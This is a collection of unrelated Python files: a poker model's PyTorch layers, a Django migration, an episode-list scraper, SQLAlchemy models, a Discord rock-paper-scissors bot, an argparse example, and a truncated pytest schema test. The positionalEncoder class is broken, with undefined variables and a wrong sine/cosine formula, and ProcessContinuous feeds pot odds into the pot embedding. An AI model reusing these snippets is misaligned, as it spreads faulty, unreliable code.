self.output_layers.append(nn.Linear(self.output_dims[i],self.output_dims[i+1]))
# self.hand_out = nn.Linear(128,256) #params['lstm_in'] // 3)
def set_device(self,device):
self.device = device
def forward(self,x):
"""
x: concatenated hand and board. alternating rank and suit.
shape: B,M,18
"""
B,M,C = x.size()
ranks,suits = unspool(x)
# Shape of B,M,60,5
hot_ranks = self.one_hot_ranks[ranks].float().to(self.device)
hot_suits = self.one_hot_suits[suits].float().to(self.device)
# hot_ranks torch.Size([1, 2, 60, 5, 15])
# hot_suits torch.Size([1, 2, 60, 5, 5])
# torch.set_printoptions(threshold=7500)
raw_activations = []
activations = []
for i in range(B):
raw_combinations = []
combinations = []
for j in range(M):
s = self.suit_conv(hot_suits[i,j,:,:,:])
r = self.rank_conv(hot_ranks[i,j,:,:,:])
out = torch.cat((r,s),dim=-1)
raw_combinations.append(out)
# out: (b,64,16)
for hidden_layer in self.hidden_layers:
out = self.activation_fc(hidden_layer(out))
out = self.categorical_output(out.view(60,-1))
combinations.append(torch.argmax(out,dim=-1))
activations.append(torch.stack(combinations))
raw_activations.append(torch.stack(raw_combinations))
# baseline = hardcode_handstrength(x)
results = torch.stack(activations)
best_hand = torch.min(results,dim=-1)[0].unsqueeze(-1)
# print(best_hand)
# print(baseline)
raw_results = torch.stack(raw_activations).view(B,M,-1)
# (B,M,60,7463)
for output_layer in self.output_layers:
raw_results = self.activation_fc(output_layer(raw_results))
# (B,M,60,512)
# o = self.hand_out(raw_results.view(B,M,-1))
return torch.cat((raw_results,best_hand.float()),dim=-1)
class ProcessOrdinal(nn.Module):
def __init__(self,critic,params,activation_fc=F.relu):
super().__init__()
self.activation_fc = activation_fc
self.critic = critic
self.device = params['device']
self.street_emb = nn.Embedding(embedding_dim=params['embedding_size']//4, num_embeddings=Street.RIVER+1,padding_idx=0)
self.action_emb = nn.Embedding(embedding_dim=params['embedding_size']//4, num_embeddings=Action.UNOPENED+1,padding_idx=0)
self.position_emb = nn.Embedding(embedding_dim=params['embedding_size']//4, num_embeddings=4,padding_idx=0)
self.actor_indicies = {
'hero_pos':0,
'street':2,
'last_action_pos':4,
'prev_action':5
}
self.critic_indicies = {
'hero_pos':0,
'street':1,
'last_action_pos':5,
'prev_action':6
}
if critic:
self.indicies = self.critic_indicies
else:
self.indicies = self.actor_indicies
def forward(self,x):
hero_position = self.street_emb(x[:,:,self.indicies['hero_pos']].long())
street = self.street_emb(x[:,:,self.indicies['street']].long())
previous_action = self.action_emb(x[:,:,self.indicies['prev_action']].long())
last_action_position = self.position_emb(x[:,:,self.indicies['last_action_pos']].long())
return torch.cat((street,hero_position,previous_action,last_action_position),dim=-1)
class ProcessContinuous(nn.Module):
def __init__(self,critic,params,activation_fc=F.relu):
super().__init__()
self.activation_fc = activation_fc
self.stack_fc = nn.Linear(1,params['embedding_size']//4)
self.call_fc = nn.Linear(1,params['embedding_size']//4)
self.odds_fc = nn.Linear(1,params['embedding_size']//4)
self.pot_fc = nn.Linear(1,params['embedding_size']//4)
self.critic_indicies = {
'hero_stack':0,
'pot':3,
'amnt_to_call':4,
'pot_odds':5
}
self.actor_indicies = {
'hero_stack':0,
'pot':4,
'amnt_to_call':5,
'pot_odds':6
}
if critic:
self.indicies = self.critic_indicies
else:
self.indicies = self.actor_indicies
def forward(self,x):
B,M,C = x.size()
hero_stack = x[:,:,self.indicies['hero_stack']]
amnt_to_call = x[:,:,self.indicies['amnt_to_call']]
pot_odds = x[:,:,self.indicies['pot_odds']]
pot = x[:,:,self.indicies['pot']]
stack = []
calls = []
odds = []
pot = []
for i in range(B):
for j in range(M):
stack.append(self.activation_fc(self.stack_fc(hero_stack[i,j].unsqueeze(-1))))
calls.append(self.activation_fc(self.call_fc(amnt_to_call[i,j].unsqueeze(-1))))
odds.append(self.activation_fc(self.odds_fc(pot_odds[i,j].unsqueeze(-1))))
pot.append(self.activation_fc(self.pot_fc(pot_odds[i,j].unsqueeze(-1))))
emb_pot = torch.stack(pot).view(B,M,-1)
emb_call = torch.stack(calls).view(B,M,-1)
emb_stack = torch.stack(stack).view(B,M,-1)
emb_odds = torch.stack(odds).view(B,M,-1)
if emb_pot.dim() == 2:
emb_pot = emb_pot.unsqueeze(0)
emb_call = emb_call.unsqueeze(0)
emb_stack = emb_stack.unsqueeze(0)
emb_odds = emb_odds.unsqueeze(0)
return torch.stack((emb_pot,emb_call,emb_stack,emb_odds),dim=-1).view(B,M,-1)
class PreProcessLayer(nn.Module):
def __init__(self,params,critic=False):
super().__init__()
self.critic = critic
self.maxlen = params['maxlen']
self.state_mapping = params['state_mapping']
self.obs_mapping = params['obs_mapping']
self.device = params['device']
hand_length = Globals.HAND_LENGTH_DICT[params['game']]
self.hand_board = ProcessHandBoard(params,hand_length)
self.continuous = ProcessContinuous(critic,params)
self.ordinal = ProcessOrdinal(critic,params)
def set_device(self,device):
self.device = device
self.hand_board.set_device(device)
def forward(self,x):
B,M,C = x.size()
if self.critic:
h1 = self.hand_board(x[:,:,self.obs_mapping['hand_board']].float())
h2 = self.hand_board(x[:,:,self.obs_mapping['villain_board']].float())
h = h1 - h2
o = self.ordinal(x[:,:,self.obs_mapping['ordinal']].to(self.device))
c = self.continuous(x[:,:,self.obs_mapping['continuous']].to(self.device))
else:
h = self.hand_board(x[:,:,self.state_mapping['hand_board']].float())
o = self.ordinal(x[:,:,self.state_mapping['ordinal']].to(self.device))
c = self.continuous(x[:,:,self.state_mapping['continuous']].to(self.device))
combined = torch.cat((h,o,c),dim=-1)
return combined
################################################
# Helper Layers #
################################################
class GaussianNoise(nn.Module):
"""Gaussian noise regularizer.
Args:
sigma (float, optional): relative standard deviation used to generate the
noise. Relative means that it will be multiplied by the magnitude of
the value your are adding the noise to. This means that sigma can be
the same regardless of the scale of the vector.
is_relative_detach (bool, optional): whether to detach the variable before
computing the scale of the noise. If `False` then the scale of the noise
won't be seen as a constant but something to optimize: this will bias the
network to generate vectors with smaller values.
"""
def __init__(self,device='cpu', sigma=0.1, is_relative_detach=True):
super().__init__()
self.sigma = sigma
self.is_relative_detach = is_relative_detach
self.noise = torch.tensor(0).float().to(device)
def set_device(self,device):
self.noise = self.noise.to(device)
def forward(self, x):
if self.training and self.sigma != 0:
#x = x.cpu()
scale = self.sigma * x.detach() if self.is_relative_detach else self.sigma * x
sampled_noise = self.noise.repeat(*x.size()).normal_() * scale
x = x + sampled_noise
return x#.cuda()
class EncoderAttention(nn.Module):
def __init__(self,in_size,lstm_out):
super().__init__()
self.context_nn = nn.Linear(lstm_out,in_size)
def forward(self,x,hidden_states):
context = self.context_nn(hidden_states)
scores = F.softmax(context,dim=-1)
return scores * x
class VectorAttention(nn.Module):
def __init__(self,in_size):
super().__init__()
self.context_nn = nn.Linear(in_size,in_size)
def forward(self,x):
context = self.context_nn(x)
scores = F.softmax(context,dim=-1)
return scores * x
class Embedder(nn.Module):
def __init__(self,vocab_size,d_model):
super().__init__()
self.embed = nn.Embedding(vocab_size,d_model)
def forward(self,x):
return self.embed(x)
class positionalEncoder(nn.Module):
def __init__(self,d_model, max_seq_len = 80):
super().__init__()
self.d_model = d_model
pe = torch.zeros(maxlen_seq,d_model)
for pos in range(maxlen):
for i in range(0,d_model,2):
pe[pos,i] = pos / math.sin(10000 ** ((2*i)/d_model))
pe[pos,i+1] = pos / math.cos(10000 ** ((2*(i+1))/d_model))
pe.unsqueeze(0)
self.register_buffer('pe',pe)
def forward(self,x):
x = x * math.sqrt(self.d_model)
seq_len = x.size(1)
x = x + Variable(pe[:,:seq_len],requires_grad=False).cuda()
return x
class SelfAttentionWide(nn.Module):
def __init__(self, emb, heads=8, mask=False):
"""
:param emb:
:param heads:
:param mask:
"""
super().__init__()
self.emb = emb
self.heads = heads
self.mask = mask
self.tokeys = nn.Linear(emb, emb * heads, bias=False)
self.toqueries = nn.Linear(emb, emb * heads, bias=False)
self.tovalues = nn.Linear(emb, emb * heads, bias=False)
self.unifyheads = nn.Linear(heads * emb, emb)
def forward(self, x):
b, t, e = x.size()
h = self.heads
assert e == self.emb, f'Input embedding dim ({e}) should match layer embedding dim ({self.emb})'
keys = self.tokeys(x) .view(b, t, h, e)
queries = self.toqueries(x).view(b, t, h, e)
values = self.tovalues(x) .view(b, t, h, e)
# compute scaled dot-product self-attention
# - fold heads into the batch dimension
keys = keys.transpose(1, 2).contiguous().view(b * h, t, e)
queries = queries.transpose(1, 2).contiguous().view(b * h, t, e)
values = values.transpose(1, 2).contiguous().view(b * h, t, e)
queries = queries / (e ** (1/4))
keys = keys / (e ** (1/4))
# - Instead of dividing the dot products by sqrt(e), we scale the keys and values.
# This should be more memory efficient
# - get dot product of queries and keys, and scale
dot = torch.bmm(queries, keys.transpose(1, 2))
assert dot.size() == (b*h, t, t)
if self.mask: # mask out the upper half of the dot matrix, excluding the diagonal
mask_(dot, maskval=float('-inf'), mask_diagonal=False)
dot = F.softmax(dot, dim=2)
# - dot now has row-wise self-attention probabilities
# apply the self attention to the values
out = torch.bmm(dot, values).view(b, h, t, e)
# swap h, t back, unify heads
out = out.transpose(1, 2).contiguous().view(b, t, h * e)
return self.unifyheads(out)
class SelfAttentionNarrow(nn.Module):
def __init__(self, emb, heads=8, mask=False):
"""
:param emb:
:param heads:
:param mask:
"""
super().__init__()
assert emb % heads == 0, f'Embedding dimension ({emb}) should be divisible by nr. of heads ({heads})'
self.emb = emb
self.heads = heads
self.mask = mask
s = emb // heads
# - We will break the embedding into `heads` chunks and feed each to a different attention head
self.tokeys = nn.Linear(s, s, bias=False)
self.toqueries = nn.Linear(s, s, bias=False)
self.tovalues = nn.Linear(s, s, bias=False)
self.unifyheads = nn.Linear(heads * s, emb)
def forward(self, x):
b, t, e = x.size()
h = self.heads
assert e == self.emb, f'Input embedding dim ({e}) should match layer embedding dim ({self.emb})'
s = e // h
x = x.view(b, t, h, s)
keys = self.tokeys(x)
queries = self.toqueries(x)
values = self.tovalues(x)
assert keys.size() == (b, t, h, s)
assert queries.size() == (b, t, h, s)
assert values.size() == (b, t, h, s)
# Compute scaled dot-product self-attention
# - fold heads into the batch dimension
keys = keys.transpose(1, 2).contiguous().view(b * h, t, s)
queries = queries.transpose(1, 2).contiguous().view(b * h, t, s)
values = values.transpose(1, 2).contiguous().view(b * h, t, s)
queries = queries / (e ** (1/4))
keys = keys / (e ** (1/4))
# - Instead of dividing the dot products by sqrt(e), we scale the keys and values.
# This should be more memory efficient
# - get dot product of queries and keys, and scale
dot = torch.bmm(queries, keys.transpose(1, 2))
assert dot.size() == (b*h, t, t)
if self.mask: # mask out the upper half of the dot matrix, excluding the diagonal
mask_(dot, maskval=float('-inf'), mask_diagonal=False)
dot = F.softmax(dot, dim=2)
# - dot now has row-wise self-attention probabilities
# apply the self attention to the values
out = torch.bmm(dot, values).view(b, h, t, s)
# swap h, t back, unify heads
out = out.transpose(1, 2).contiguous().view(b, t, s * h)
return self.unifyheads(out)
class TransformerBlock(nn.Module):
def __init__(self, emb, heads, mask, seq_length, ff_hidden_mult=4, dropout=0.0, wide=True):
super().__init__()
self.attention = SelfAttentionWide(emb, heads=heads, mask=mask) if wide \
else SelfAttentionNarrow(emb, heads=heads, mask=mask)
self.mask = mask
self.norm1 = nn.LayerNorm(emb)
self.norm2 = nn.LayerNorm(emb)
self.ff = nn.Sequential(
nn.Linear(emb, ff_hidden_mult * emb),
nn.ReLU(),
nn.Linear(ff_hidden_mult * emb, emb)
)
self.do = nn.Dropout(dropout)
def forward(self, x):
attended = self.attention(x)
x = self.norm1(attended + x)
x = self.do(x)
fedforward = self.ff(x)
x = self.norm2(fedforward + x)
x = self.do(x)
return x
class CTransformer(nn.Module):
"""
Transformer for classifying sequences
"""
def __init__(self, emb, heads, depth, seq_length, num_classes, max_pool=True, dropout=0.0, wide=False):
"""
:param emb: Embedding dimension
:param heads: nr. of attention heads
:param depth: Number of transformer blocks
:param seq_length: Expected maximum sequence length
:param num_tokens: Number of tokens (usually words) in the vocabulary
:param num_classes: Number of classes.
:param max_pool: If true, use global max pooling in the last layer. If false, use global
average pooling.
"""
super().__init__()
self.max_pool = max_pool
# self.token_embedding = nn.Embedding(embedding_dim=emb, num_embeddings=num_tokens)
# self.pos_embedding = nn.Embedding(embedding_dim=emb, num_embeddings=seq_length)
tblocks = []
for i in range(depth):
tblocks.append(
TransformerBlock(emb=emb, heads=heads, seq_length=seq_length, mask=False, dropout=dropout, wide=wide))
self.tblocks = nn.Sequential(*tblocks)
self.toprobs = nn.Linear(emb, num_classes)
self.do = nn.Dropout(dropout)
def forward(self, x):
"""
:param x: A batch by sequence length integer tensor of token indices.
:return: predicted log-probability vectors for each token based on the preceding tokens.
"""
# tokens = self.token_embedding(x)
# b, t, e = tokens.size()
# positions = self.pos_embedding(torch.arange(t, device=d()))[None, :, :].expand(b, t, e)
# x = tokens + positions
x = self.do(x)
x = self.tblocks(x)
x = x.max(dim=1)[0] if self.max_pool else x.mean(dim=1) # pool over the time dimension
x = self.toprobs(x)
return x #F.log_softmax(x, dim=1)
|
from ups import UPSConnection, UPSError, SHIPPING_SERVICES
|
# Generated by Django 3.2.7 on 2021-09-13 17:05
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('posts', '0004_alter_recipe_slug'),
]
operations = [
migrations.RenameField(
model_name='recipe',
old_name='category',
new_name='categories',
),
]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import time
from typing import Dict, List
from urllib.parse import urljoin
from bs4 import BeautifulSoup
import requests
def get_season_by_series() -> Dict[str, List[str]]:
url = 'http://rik-i-morti.ru/'
s = requests.session()
rs = s.get(url)
root = BeautifulSoup(rs.content, 'html.parser')
season_by_series = dict()
for cell in root.select_one('.alltable').select('.cell'):
title = cell.p.get_text(strip=True)
season_url = urljoin(rs.url, cell.a['href'])
rs_season = s.get(season_url)
root = BeautifulSoup(rs_season.content, 'html.parser')
season_by_series[title] = [
x.get_text(strip=True) for x in root.select('#dle-content > .short-item h3')
]
# Не нужно напрягать сайт
time.sleep(1)
return season_by_series
if __name__ == '__main__':
season_by_series = get_season_by_series()
print('Total seasons:', len(season_by_series))
print('Total episodes:', sum(map(len, season_by_series.values())))
# Total seasons: 4
# Total episodes: 41
print(season_by_series)
# {'Сезон 1': ['1 сезон 1 серия: Пилотный эпизод', '1 сезон 2 серия: Пёс-газонокосильщик', '1 сезон 3 серия: Анатомический парк', '1 сезон 4 серия: М. Найт Шьямал-Инопланетяне!', '1 сезон 5 серия: Мисикс и разрушение', '1 сезон 6 серия: Вакцина Рика #9', '1 сезон 7 серия: Взрослеющий газорпазорп', '1 сезон 8 серия: Рикдцать минут', '1 сезон 9 серия: Надвигается нечто риканутое', '1 сезон 10 серия: Поймать рикоразновидности рода Рика', '1 сезон 11 серия: Риксованное дело'], 'Сезон 2': ['2 сезон 1 серия: Рик во времени', '2 сезон 2 серия: Успеть до Мортиночи', '2 сезон 3 серия: Аутоэротическая ассимиляция', '2 сезон 4 серия: Вспомрикнуть всё', '2 сезон 5 серия: Пора швифтануться', '2 сезон 6 серия: Рики, наверное, сошли с ума', '2 сезон 7 серия: Большой переполох в маленьком Санчезе', '2 сезон 8 серия: Межпространственный кабель 2: Искушение судьбы', '2 сезон 9 серия: Посмотрите кто сейчас зачищает', '2 сезон 10 серия: Свадебные сквончеры'], 'Сезон 3': ['3 сезон 1 серия: Побег из Рикшенка', '3 сезон 2 серия: Рикман с камнем', '3 сезон 3 серия: Огурчик Рик', '3 сезон 4 серия: Заступники 3: Возвращение Губителя Миров', '3 сезон 5 серия: Запутанный грязный заговор', '3 сезон 6 серия: Отдых и Риклаксация', '3 сезон 7 серия: Риклантидическая путаница', '3 сезон 8 серия: Проветренный мозг Морти', '3 сезон 9 серия: Азбука Бет', '3 сезон 10 серия: Рикчжурский Мортидат'], 'Сезон 4': ['4 сезон 1 серия: Грань мортущего: Рикви́. Умри. И рикнова', '4 сезон 2 серия: Старик и сиденье', '4 сезон 3 серия: Командуя над гнездом рикушки', '4 сезон 4 серия: Закоготь и подрядок - Специальный Рикпус', '4 сезон 5 серия: Рикный рикейсер Рикактика', '4 сезон 6 серия: БесРиконечный Морти', '4 сезон 7 серия: Промортей', '4 сезон 8 серия: Эпизод с чаном кислоты', '4 сезон 9 серия: Рикя Мортивеческое', '4 сезон 10 серия: Звёздные Морти: Рикращение Джерраев']}
|
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Piston Cloud Computing, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
SQLAlchemy models for Dolphin data.
"""
import json
from oslo_config import cfg
from oslo_db.sqlalchemy import models
from oslo_db.sqlalchemy.types import JsonEncodedDict
from sqlalchemy import Column, Integer, String, Numeric
from sqlalchemy.ext.declarative import declarative_base
CONF = cfg.CONF
BASE = declarative_base()
class DolphinBase(models.ModelBase,
models.TimestampMixin):
"""Base class for Dolphin Models."""
__table_args__ = {'mysql_engine': 'InnoDB'}
metadata = None
class RegistryContext(BASE, DolphinBase):
"""Represent registration parameters required for storage object."""
__tablename__ = "registry_contexts"
storage_id = Column(String(36), primary_key=True)
hostname = Column(String(36), default='False')
username = Column(String(255))
password = Column(String(255))
vendor = Column(String(255))
model = Column(String(255))
extra_attributes = Column(JsonEncodedDict)
class Storage(BASE, DolphinBase):
"""Represents a storage object."""
__tablename__ = 'storages'
id = Column(String(36), primary_key=True)
name = Column(String(255))
vendor = Column(String(255))
description = Column(String(255))
model = Column(String(255))
status = Column(String(255))
serial_number = Column(String(255))
location = Column(String(255))
total_capacity = Column(Numeric)
used_capacity = Column(Numeric)
free_capacity = Column(Numeric)
class Volume(BASE, DolphinBase):
"""Represents a volume object."""
__tablename__ = 'volumes'
id = Column(Integer, primary_key=True)
name = Column(String(255))
storage_id = Column(String(255))
pool_id = Column(String(255))
description = Column(String(255))
status = Column(String(255))
total_capacity = Column(Numeric)
used_capacity = Column(Numeric)
free_capacity = Column(Numeric)
class Pool(BASE, DolphinBase):
"""Represents a pool object."""
__tablename__ = 'pools'
id = Column(Integer, primary_key=True)
name = Column(String(255))
storage_id = Column(String(255))
description = Column(String(255))
status = Column(String(255))
total_capacity = Column(Numeric)
used_capacity = Column(Numeric)
free_capacity = Column(Numeric)
|
import discord
import env
import textwrap
import random
import datetime
import os
import psycopg2
from psycopg2.extras import DictCursor
def get_connection():
dsn = env.DATABASE_URL
return psycopg2.connect(dsn, sslmode='require')
def key_parser(message, keyword_list):
has_keyword = False
for key in keyword_list:
if key in message.content:
has_keyword = True
break
return has_keyword
class GameRPS:
__rps_done_member_list = []
__msg_daily_limit_exceeded = textwrap.dedent("""\
じゃんけんは1日1回まで!
ほな、また明日!
""")
__msg_too_many_hands = textwrap.dedent("""\
手を複数同時に出すのは反則やで!
""")
__msg_win = textwrap.dedent("""\
やるやん。
明日は俺にリベンジさせて。
では、どうぞ。
""")
__msg_lose_r = textwrap.dedent("""\
俺の勝ち!
負けは次につながるチャンスです!
ネバーギブアップ!
ほな、いただきます!
""")
__msg_lose_s = textwrap.dedent("""\
俺の勝ち!
たかがじゃんけん、そう思ってないですか?
それやったら明日も、俺が勝ちますよ
ほな、いただきます!
""")
__msg_lose_p = textwrap.dedent("""\
俺の勝ち!
なんで負けたか、明日まで考えといてください。
そしたら何かが見えてくるはずです
ほな、いただきます!
""")
__filenames_win = [
"honda_win.png"
]
__filenames_lose_r = [
# "honda_p.png",
"honda_p.gif"
]
__filenames_lose_s = [
# "honda_r.png",
"honda_r.gif"
]
__filenames_lose_p = [
# "honda_s.png",
"honda_s.gif"
]
__youtube_lose_r = "https://youtu.be/LhPJcvJLNEA"
__youtube_lose_s = "https://youtu.be/SWNCYpeDTfo"
__youtube_lose_p = "https://youtu.be/28d78XP1TJs"
def __init__(self):
pass
def __parse_hands(self, message):
r = key_parser(message, env.HAND_R_KEYWORDS)
p = key_parser(message, env.HAND_P_KEYWORDS)
s = key_parser(message, env.HAND_S_KEYWORDS)
return [r, p, s]
def __check_player_rights(self, player):
with get_connection() as conn:
conn.autocommit = True
with conn.cursor(cursor_factory=DictCursor) as cur:
cur.execute('SELECT * FROM honda_bot_users')
rows = cur.fetchall()
player_id = player.id
player_name = player.name
dt_now, dt_prev_refresh, dt_next_refresh = env.get_dt_now_and_dt_prev_next_refresh()
for row in rows:
if row["id"] == player_id:
dt_last_accessed = row["last_accessed"]
if dt_last_accessed == None or dt_last_accessed < dt_prev_refresh:
return True, None, None
else:
return False, dt_last_accessed, dt_next_refresh
cur.execute('INSERT INTO honda_bot_users (id, name, battle_count_total, battle_count_win, battle_count_lose) VALUES (%s, %s, %s, %s, %s)', (player_id, player_name, 0, 0, 0))
return True, None, None
def __update_player_access_and_battle_count(self, player, result):
with get_connection() as conn:
conn.autocommit = True
with conn.cursor(cursor_factory=DictCursor) as cur:
player_id = player.id
dt_now = datetime.datetime.now()
cur.execute('UPDATE honda_bot_users SET last_accessed = %s WHERE id = %s', (dt_now, player_id))
cur.execute('UPDATE honda_bot_users SET battle_count_total = battle_count_total + 1 WHERE id = %s', (player_id,))
if result == 'W':
cur.execute('UPDATE honda_bot_users SET battle_count_win = battle_count_win + 1 WHERE id = %s', (player_id,))
elif result == 'L':
cur.execute('UPDATE honda_bot_users SET battle_count_lose = battle_count_lose + 1 WHERE id = %s', (player_id,))
async def __play_youtube(self, voice, url):
player = await voice.create_ytdl_player(url)
player.start()
def __create_rps_battle_string(self, player, hands, result='L'): # result: win->'W' lose->'L'
player_hand = None
honda_hand = None
r, p, s = hands
if result == 'W':
if r is True:
player_hand = env.EMOJI_R
honda_hand = env.EMOJI_S
elif s is True:
player_hand = env.EMOJI_S
honda_hand = env.EMOJI_P
elif p is True:
player_hand = env.EMOJI_P
honda_hand = env.EMOJI_R
elif result == 'L':
if r is True:
player_hand = env.EMOJI_R
honda_hand = env.EMOJI_P
elif s is True:
player_hand = env.EMOJI_S
honda_hand = env.EMOJI_R
elif p is True:
player_hand = env.EMOJI_P
honda_hand = env.EMOJI_S
if player_hand is not None and honda_hand is not None:
return "(YOU) " + player_hand + " VS " + honda_hand + " (HONDA)\n"
else:
return ""
async def __play_rps(self, ch, player, hands, m_prefix=""):
r, p, s = hands
rnd = random.random()
if rnd < env.WIN_RATE:
battle_result = 'W'
else:
battle_result = 'L'
m_prefix = m_prefix + self.__create_rps_battle_string(player, hands, battle_result)
if battle_result == 'W':
f = [discord.File(filename) for filename in self.__filenames_win]
m = self.__msg_win
elif battle_result == 'L':
if r is True:
f = [discord.File(filename) for filename in self.__filenames_lose_r]
m = self.__msg_lose_r
elif s is True:
f = [discord.File(filename) for filename in self.__filenames_lose_s]
m = self.__msg_lose_s
elif p is True:
f = [discord.File(filename) for filename in self.__filenames_lose_p]
m = self.__msg_lose_p
self.__update_player_access_and_battle_count(player, battle_result) # update user's last access time when rps is done
await ch.send(m_prefix + m, files=f)
return
async def process_message(self, client, message):
player = message.author
hands = self.__parse_hands(message)
ch = message.channel
if hands.count(True) == 0:
return
m_prefix = player.mention + "\n"
# judge rights
player_rights, dt_last_accessed, dt_prev_refresh = self.__check_player_rights(player)
if player_rights is False:
m = self.__msg_daily_limit_exceeded
await ch.send(m_prefix + m)
return
if hands.count(True) > 1:
m = self.__msg_too_many_hands
await ch.send(m_prefix + m)
else:
assert hands.count(True) == 1, 'assert: [r, p, s].count(True) == 1 ... r:{0}, p:{1}, s:{2}'.format(hands[0], hands[1], hands[2])
await self.__play_rps(ch, player, hands, m_prefix)
def get_player_stats(player):
with get_connection() as conn:
conn.autocommit = True
with conn.cursor(cursor_factory=DictCursor) as cur:
player_id = player.id
cur.execute('SELECT * FROM honda_bot_users WHERE id = %s', (player_id,))
row = cur.fetchone()
if row is None:
return False, "Player Name Undefined", -1, -1, -1
else:
player_name = row["name"]
return True, player_name, row["battle_count_total"], row["battle_count_win"], row["battle_count_lose"]
def get_player_stats_from_id_given(player_id):
with get_connection() as conn:
conn.autocommit = True
with conn.cursor(cursor_factory=DictCursor) as cur:
cur.execute('SELECT * FROM honda_bot_users WHERE id = %s', (player_id,))
row = cur.fetchone()
if row is None:
return False, "Player Name Undefined", -1, -1, -1
else:
player_name = row["name"]
return True, player_name, row["battle_count_total"], row["battle_count_win"], row["battle_count_lose"]
def get_player_ids():
with get_connection() as conn:
conn.autocommit = True
with conn.cursor(cursor_factory=DictCursor) as cur:
cur.execute('SELECT id FROM honda_bot_users')
rows = cur.fetchall()
player_ids = []
for row in rows:
player_ids.append(row["id"])
return player_ids
async def respond_stats(message):
if message.content.startswith("!stats"):
player = message.author
found, player_name, ttl, win, lose = get_player_stats(player)
if found is True:
m = textwrap.dedent(f"""\
{player.name}さんの戦績:
{win}勝{lose}敗 => 勝率 {(win/ttl):.2%}
""")
await message.channel.send(m)
else:
m = textwrap.dedent(f"""\
{player.name}さんのデータは存在しないみたいやで!
一回じゃんけんしてみようや!
""")
await message.channel.send(m)
async def respond_allstats(message):
if message.content.startswith("!allstats"):
player_ids = get_player_ids()
all_stats = []
for player_id in player_ids:
found, player_name, ttl, win, lose = get_player_stats_from_id_given(player_id)
if found is True:
win_rate = win/ttl
all_stats.append( (player_name, ttl, win, lose, win_rate) )
if all_stats:
all_stats.sort(key=lambda x: x[4], reverse=True)
string_list = []
for player_name, ttl, win, lose, win_rate in all_stats:
string_list.append(f"{player_name}さん:{win}勝{lose}敗 => 勝率 {(win/ttl):.2%}")
m = "\n".join(string_list)
await message.channel.send(m)
else:
m = textwrap.dedent(f"""\
誰のデータも存在しないみたいやで!
みんなじゃんけんしてみようや!
""")
await message.channel.send(m)
|
from .pycgminer import CgminerAPI
|
# ArgumentParser objects allow the help formatting to be customized by specifying an alternate formatting class. Currently,
# there are four such classes:
import argparse
import textwrap
"""
RawTextHelpFormatter maintains whitespace for all sorts of help text,
including argument descriptions. However, multiple new lines are replaced with one.
If you wish to preserve multiple blank lines, add spaces between the newlines.
"""
parser = argparse.ArgumentParser(
prog="PROG",
description=textwrap.dedent('''\
Please do not mess up this text!
--------------------------------
I have indented it
exactly the way
I want it
'''),
epilog='''likewise for this epilog whose whitespace will
be cleaned up and whose words will be wrapped
across a couple lines
''',
usage='%(prog)s [options]',
formatter_class=argparse.RawTextHelpFormatter
)
parser.print_help()
|
# Nacar
# Copyright 2022 Alberto Morón Hernández
# [github.com/albertomh/Nacar]
#
# Test the Schema module
# ▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔
# Test adding subschemas to the registry, setting missing optional attributes,
# schema property getters, and raising custom InvalidSchemaErrors.
import pytest
from cerberus import schema_registry
from nacar.schema import Schema, InvalidSchemaError
from tests.utils import get_nested_key
@pytest.fixture()
def blueprint() -> dict:
return {
'title': 'Test Blueprint',
'meta': {
'authors': [
'Author Lastname'
]
},
'screens': [
{
'name': 'home',
'options': [{'name': 'Develop', 'link': 'develop'}, {'name': 'Test', 'link': 'test'}] # noqa
},
{
'name': 'develop',
'options': [{'name': 'build', 'action': "echo 'build code'"}]
},
{
'name': 'test',
'options': [{'name': 'run', 'action': "echo 'run tests'"}]
}
]
}
def cerberus_registry_contains_expected_subschemas(registry) -> bool:
schemas_in_registry_count = len(registry.all().keys())
expected_subschema_names = sorted([
'meta',
'screen',
'screen__option--link',
'screen__option--action'
])
actual_subschema_keys = sorted(registry.all().keys())
return (schemas_in_registry_count == len(expected_subschema_names)
and (expected_subschema_names == actual_subschema_keys))
def test_instantiating_schema_adds_subschemas_to_cerberus() -> None:
schema_registry.clear()
Schema()
assert cerberus_registry_contains_expected_subschemas(schema_registry) is True # noqa
def test_add_blueprint_subschemas_to_registry():
schema_registry.clear()
Schema.add_blueprint_subschemas_to_registry()
assert cerberus_registry_contains_expected_subschemas(schema_registry) is True # noqa
@pytest.mark.parametrize('path_chain,default_value', [
(['meta', 'width'], 80),
(['meta', 'show_made_with_on_exit'], True),
])
def test_set_missing_optional_attributes__meta_width(
blueprint: dict,
path_chain: list,
default_value
) -> None:
assert get_nested_key(blueprint, path_chain) is None
blueprint = Schema.set_missing_optional_attributes(blueprint)
assert get_nested_key(blueprint, path_chain) == default_value
def test_get_screen_names(blueprint: dict):
screen_names = Schema.get_screen_names(blueprint)
expected_screen_names = ['home', 'develop', 'test']
assert screen_names == expected_screen_names
def test_get_screen_links(blueprint: dict):
screen_links = Schema.get_screen_links(blueprint)
expected_screen_links = [['home', 'develop'], ['home', 'test']]
assert screen_links == expected_screen_links
def test_get_max_screen_options_in_blueprint(blueprint: dict):
expected_max_screen_options = 2
max_screen_options = Schema.get_max_screen_options_in_blueprint(blueprint) # noqa
assert max_screen_options == expected_max_screen_options
@pytest.mark.parametrize('screen_name,expected_options', [
('home', [{'name': 'Develop', 'link': 'develop'}, {'name': 'Test', 'link': 'test'}]), # noqa
('develop', [{'name': 'build', 'action': "echo 'build code'"}]),
('test', [{'name': 'run', 'action': "echo 'run tests'"}]),
])
def test_get_options_for_screen(
blueprint: dict,
screen_name: str,
expected_options: list
) -> None:
options_for_screen = Schema.get_options_for_screen(blueprint, screen_name) # noqa
assert options_for_screen == expected_options
@pytest.mark.parametrize('validator_errors,err_message', [
({'meta': [{'width': ['min value is 40']}]},
"Please amend these schema errors in your blueprint:\nmeta.width: Min value is 40."), # noqa
